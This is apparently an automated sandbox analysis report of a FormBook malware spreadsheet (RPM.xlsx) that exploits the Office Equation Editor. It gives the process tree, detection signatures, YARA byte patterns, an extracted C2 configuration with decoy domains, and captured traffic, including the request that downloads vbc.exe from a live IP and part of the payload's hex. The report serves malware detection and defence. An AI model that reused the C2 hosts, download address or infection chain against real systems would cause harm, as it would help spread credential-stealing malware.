Loading ...

Play interactive tourEdit tour

Windows Analysis Report RPM.xlsx

Overview

General Information

Sample Name:RPM.xlsx
Analysis ID:491441
MD5:eaa0090a7f7c6f995a4ff9b84410ef81
SHA1:82198ab187a84b7a90ae83d57bfddd3c3acaafbc
SHA256:a81768982216ba95346c4a6eb0a591e71ab952b187565aef82331e8bb60851ea
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2584 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3064 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0ECA879131A7B104418B085DB7F761C3)
      • vbc.exe (PID: 2712 cmdline: C:\Users\Public\vbc.exe MD5: 0ECA879131A7B104418B085DB7F761C3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • svchost.exe (PID: 200 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
            • cmd.exe (PID: 2912 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vetpipes.com/scb0/"], "decoy": ["introlly.com", "slowtravelco.com", "sasanos.com", "3424soldbastrophwy.com", "isabelaefernando.net", "0754fm.com", "meta-bot.xyz", "778tt8.com", "krallechols.quest", "lipagent.com", "dermaqueeniran.com", "psychoterapeuta-wroclaw.com", "marmorariapiramide.online", "luxonealbery.com", "floridawp.com", "nebobuild.com", "facillitiespro-sweep.com", "wwgzj.com", "puffsmoke.online", "cryptofuelcars.com", "mcintoshsonoystercompany.com", "viscoent.online", "daveparkernotary.com", "publicschools.fail", "traexcel.com", "lovelypersonals.com", "emptycc.net", "omniriot.com", "etsawi9.com", "rangerbuddys.com", "medchemic.com", "paparazziprom.com", "atelifer.com", "imlgw.com", "vaguva.com", "theportlandhandyman.com", "oggu2.com", "fuchs-consolidated.net", "onluo.com", "flirtylocals.xyz", "foxyladynails.com", "dgyej.com", "cloudmaigc.com", "lafabriqueabeille.com", "vivagru.com", "fuckingmom88.xyz", "caesarscssino.com", "jyh8882.com", "diyiyc.com", "lanceseuexpert.digital", "omshivematka.com", "agrigain-soil.com", "burgettflorist.com", "goddarddrillingllc.com", "nchh07.xyz", "tabulose-paare.com", "notlficationintuit.com", "killercross.com", "storybylightstudio.com", "flex-ecommerce.com", "fearlessthread.com", "skateboardlovers.com", "mgav34.xyz", "lucanos.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ca9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dbc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cd8:$sqlite3text: 68 38 2A 90 C5
        • 0x15dfd:$sqlite3text: 68 38 2A 90 C5
        • 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
        6.2.vbc.exe.34cc4f0.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.vbc.exe.34cc4f0.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x88878:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x88c02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x94915:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x94401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x94a17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x94b8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8961a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x9367c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x8a392:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x99de7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x9ae8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.95.13.176, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3064
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 200
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3064
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 200
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 200

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.vetpipes.com/scb0/"], "decoy": ["introlly.com", "slowtravelco.com", "sasanos.com", "3424soldbastrophwy.com", "isabelaefernando.net", "0754fm.com", "meta-bot.xyz", "778tt8.com", "krallechols.quest", "lipagent.com", "dermaqueeniran.com", "psychoterapeuta-wroclaw.com", "marmorariapiramide.online", "luxonealbery.com", "floridawp.com", "nebobuild.com", "facillitiespro-sweep.com", "wwgzj.com", "puffsmoke.online", "cryptofuelcars.com", "mcintoshsonoystercompany.com", "viscoent.online", "daveparkernotary.com", "publicschools.fail", "traexcel.com", "lovelypersonals.com", "emptycc.net", "omniriot.com", "etsawi9.com", "rangerbuddys.com", "medchemic.com", "paparazziprom.com", "atelifer.com", "imlgw.com", "vaguva.com", "theportlandhandyman.com", "oggu2.com", "fuchs-consolidated.net", "onluo.com", "flirtylocals.xyz", "foxyladynails.com", "dgyej.com", "cloudmaigc.com", "lafabriqueabeille.com", "vivagru.com", "fuckingmom88.xyz", "caesarscssino.com", "jyh8882.com", "diyiyc.com", "lanceseuexpert.digital", "omshivematka.com", "agrigain-soil.com", "burgettflorist.com", "goddarddrillingllc.com", "nchh07.xyz", "tabulose-paare.com", "notlficationintuit.com", "killercross.com", "storybylightstudio.com", "flex-ecommerce.com", "fearlessthread.com", "skateboardlovers.com", "mgav34.xyz", "lucanos.info"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: RPM.xlsxVirustotal: Detection: 32%Perma Link
          Source: RPM.xlsxReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY
          Source: 7.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
          Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514238693.0000000000030000.00000040.00020000.sdmp
          Source: global trafficDNS query: name: www.atelifer.com
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.13.176:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.13.176:80

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 204.141.43.204 80
          Source: C:\Windows\explorer.exeDomain query: www.floridawp.com
          Source: C:\Windows\explorer.exeDomain query: www.atelifer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.129.2 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.187.86.150 80
          Source: C:\Windows\explorer.exeDomain query: www.viscoent.online
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Source: C:\Windows\explorer.exeDomain query: www.meta-bot.xyz
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.meta-bot.xyz
          Source: C:\Windows\explorer.exeDNS query: www.meta-bot.xyz
          Source: C:\Windows\explorer.exeDNS query: www.meta-bot.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.vetpipes.com/scb0/
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ HTTP/1.1Host: www.atelifer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ HTTP/1.1Host: www.floridawp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ HTTP/1.1Host: www.viscoent.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ HTTP/1.1Host: www.meta-bot.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.17.116.163 209.17.116.163
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 13:40:02 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Mon, 27 Sep 2021 09:27:39 GMTETag: "99000-5ccf6b55049f0"Accept-Ranges: bytesContent-Length: 626688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8b 8e 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 84 09 00 00 0a 00 00 00 00 00 00 82 a2 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a2 09 00 4f 00 00 00 00 c0 09 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 82 09 00 00 20 00 00 00 84 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 c0 09 00 00 08 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 09 00 00 02 00 00 00 8e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 a2 09 00 00 00 00 00 48 00 00 00 02 00 05 00 14 94 01 00 b4 9d 02 00 03 00 00 00 f9 02 00 06 c8 31 04 00 68 70 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 72 01 00 00 70 2a 1a 72 1b 00 00 70 2a 1e 19 8d 10 00 00 01 2a 1e 02 28 16 00 00 0a 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 86 02 03 28 0c 00 00 06 02 04 28 0e 00 00 06 04 2c 0f 04 8e 2c 0b 03 7e 17 00 00 0a 6f 33 03 00 06 2a 8a 02 03 28 0c 00 00 06 02 04 28 10 00 00 06 04 28 18 00 00 0a 2d 0b 03 7e 17 00 00 0a 6f 33 03 00 06 2a ce 02 28 0b 00 00 06 25 6f 32 03 00 06 03 28 19 00 00 0a 6f 33 03 00 06 02 28 0b 00 00 06 25 6f 32 03 00 06 72 31 00 00 70 28 19 00 00 0a 6f 33 03 00 06 2a 72 02 28 16 00 00 0a 02 03 28 17 00 00 06 02 04 28 19 00 00 06 02 05 28 1b 00 00 06 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 0
          Source: global trafficHTTP traffic detected: GET /rpm/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.13.176Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.13.176
